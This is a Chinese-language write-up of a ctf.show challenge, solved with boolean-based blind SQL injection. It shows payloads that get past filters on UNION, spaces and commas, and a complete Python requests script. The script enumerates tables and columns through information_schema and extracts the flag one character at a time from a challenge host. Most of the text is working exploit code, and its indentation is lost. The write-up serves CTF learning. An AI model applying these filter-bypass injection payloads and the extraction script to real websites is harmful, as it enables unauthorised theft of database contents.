感谢ctf show平台提供题目
打开网站,入眼看起来像sql注入。
index.php?id=0/**/or/**/1=1#
网站过滤了union 常规注入是不行了,那么进行布尔型盲注。
题目对逗号进行了过滤,那么也有绕过姿势!
' and ascii(substr((select database()),1,1))=xx #
这样的话写个脚本很容易跑出来了,过滤逗号之后可以变成这样
' and ascii(substr((select database())from 1 for 1))=xx #
这应该是substring函数的两种用法
于是构造python脚本。
for i in range(1,45):
print(i)
for j in range(31,128):
payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
ra = s.get(url=url + '?id=0/**/or/**/' + payload).text
if 'I asked nothing' in ra:
table += chr(j)
print(table)
break
运行python脚本,得到了3张表。
继续进行猜解字段名。
payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
获取数据
payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))
道理相同就不一 一演示了。
下面是完整代码。
import requests
s=requests.session()
url='http://124.156.121.112:28045/index.php'
table=""
for i in range(1,45):
print(i)
for j in range(31,128):
#爆表名 flag
#payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
#爆字段名 flag
#payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
#读取flag
payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))
ra = s.get(url=url + '?id=0/**/or/**/' + payload).text
if 'I asked nothing' in ra:
table += chr(j)
print(table)
break
原创文章不易,点个赞再走吧。
